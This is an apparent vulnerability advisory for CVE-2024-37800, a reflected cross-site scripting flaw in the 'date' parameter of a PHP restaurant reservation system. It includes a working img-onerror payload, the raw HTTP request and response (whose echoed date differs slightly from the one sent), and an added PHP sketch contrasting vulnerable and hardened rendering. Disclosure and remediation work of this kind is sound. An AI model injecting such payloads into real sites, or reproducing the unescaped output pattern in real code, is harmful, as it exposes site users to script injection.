# Exploit Title: Restaurant Reservation System v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-06-05
# Exploit Author: Sandeep Rajauriya
# Vendor Homepage: https://code-projects.org/restaurant-reservation-system-in-php-with-source-code/
# Software Link: https://download-media.code-projects.org/2020/09/Restaurant_Reservation_System_In_PHP_With_Source_Code.zip
# Version: 1.0
# Tested on: Windows 11, PHP 8.2.12, Apache 2.4.58
# CVE: CVE-2024-37800
Description: Restaurant Reservation System v1.0 allows remote attackers to inject arbitrary web script or HTML via the date parameter.
POC
1) Go to the index page of the Restaurant Reservation System.
2) Use the "Open Time" (check schedule) functionality.
3) Write your payload in the "date" parameter. Payload: "><img src=X onerror=prompt(345)></img>
4) After that you will see the prompt.
HTTP Request:
> POST /Restaurant/index.php HTTP/1.1
> Host: --REDACTED--
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate, br
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 70
> Origin: http://--REDACTED--
> Connection: close
> Referer: http://--REDACTED--/Restaurant/index.php
> Cookie: PHPSESSID=g0b9grvms17eaafu2e4gmolp17
> Upgrade-Insecure-Requests: 1
> Priority: u=1
> date=2024-06-05"><img src=X onerror=prompt(345)></img>&check_schedule=
HTTP Response:
> HTTP/1.1 200 OK
> Date: Wed, 05 Jun 2024 14:15:38 GMT
> Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
> X-Powered-By: PHP/8.2.12
> Expires: Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control: no-store, no-cache, must-revalidate
> Pragma: no-cache
> Connection: close
> Content-Type: text/html; charset=UTF-8
> Content-Length: 14584
>
> <!DOCTYPE html>
> --REDACTED--
> <html lang="en">
> <head>
> <table class='table table-striped table-dark text-center'>
> <thead>
> <tr>
> <th scope='col'>Date</th>
> <th scope='col'>Open Time</th>
> <th scope='col'>Close Time</th>
> </tr>
> </thead>
> <tbody>
> <tr>
> <th scope='row'><em>2024-06-14"><img src=X onerror=prompt(345)></img></em></th>
> <td>12:00</td>
> <td>00:00</td>
> </tr>
> </tbody>
> </table>
> </div><br>
> </div>
> --REDACTED--
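Added illustration, not the project's own source (which the advisory does not include): a hypothetical reconstruction of how the submitted date ends up inside the `<th scope='row'><em>...</em></th>` cell seen in the response above, next to a hardened version that allowlists the date format and HTML-encodes on output. The function names and the template fragment are assumptions.

```php
<?php
// Hypothetical reconstruction (not the project's code) of the schedule row
// rendering implied by the response above, plus a hardened replacement.

// Vulnerable pattern: the submitted date is concatenated straight into the
// markup, so a quote and angle brackets in the value escape the <em> text node.
function render_schedule_row_vulnerable(string $date, string $open, string $close): string
{
    return "<tr><th scope='row'><em>{$date}</em></th>"
         . "<td>{$open}</td><td>{$close}</td></tr>";
}

// Layer 1: accept only a real calendar date in YYYY-MM-DD form.
function validate_date(string $input): ?string
{
    if (!preg_match('/^(\d{4})-(\d{2})-(\d{2})$/', $input, $m)) {
        return null;
    }
    // checkdate() rejects impossible dates such as 2024-02-30.
    if (!checkdate((int)$m[2], (int)$m[3], (int)$m[1])) {
        return null;
    }
    return $input;
}

// Layer 2: encode on output regardless of validation. ENT_QUOTES also
// encodes single quotes, which matters because this template's attributes
// are single-quoted.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_schedule_row_safe(string $date, string $open, string $close): string
{
    $clean = validate_date($date);
    if ($clean === null) {
        // Fixed message; the rejected input is never echoed back.
        return "<tr><td colspan='3'>Invalid date format</td></tr>";
    }
    return "<tr><th scope='row'><em>" . h($clean) . "</em></th>"
         . "<td>" . h($open) . "</td><td>" . h($close) . "</td></tr>";
}

// Constructed input mirroring the advisory's payload.
$payload = '2024-06-05"><img src=X onerror=prompt(345)></img>';
echo render_schedule_row_vulnerable($payload, '12:00', '00:00'), "\n"; // markup injected
echo render_schedule_row_safe($payload, '12:00', '00:00'), "\n";       // rejected
echo render_schedule_row_safe('2024-06-05', '12:00', '00:00'), "\n";  // rendered, encoded
```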